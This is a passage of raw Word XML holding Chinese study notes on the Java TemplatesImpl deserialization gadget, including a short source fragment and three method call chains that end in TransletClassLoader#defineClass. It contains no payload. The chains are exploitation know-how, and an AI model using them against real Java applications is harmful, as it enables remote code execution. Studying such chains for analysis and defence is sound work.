          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BCA6F"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>ErrorMsg</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>ErrorMsg</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>ErrorMsg</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TRANSLET_OBJECT_ERR</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, _name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B71FA42"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TransformerConfigurationException</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9AB270"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBC1AEC"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61BE54"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CF7A41"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p>
    <w:p w14:paraId="3091CC02"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b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>## </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>错误文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C2BA3"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p>
    <w:p w14:paraId="5932EDEC"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>`https://blog.weik1.top/2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/`</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>，文中提到的三个链应该是写错了，其中提到的链</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>和链</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>是一条链，而我写的是对的，其原文如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DE4B2F" w14:textId="77777777" w:rsidR="003658AD" w:rsidRPr="003658AD" w:rsidRDefault="003658AD" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="300" w:line="405" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F6F263"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>总结一下三条调用链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD8F29"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>```java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2A17DF"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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>未成功触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE2A924"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletIndex</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TransletClassLoader#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineClass</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657FAFD4"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p>
    <w:p w14:paraId="6E894BA1"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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242743BF"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>newTransformer</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getTransletInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> TransletClassLoader#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineClass</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EAB5D"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p>
    <w:p w14:paraId="77E0D25E"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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F35A36"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>getOutputProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>() </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TemplatesImpl#</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>newTransformer</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
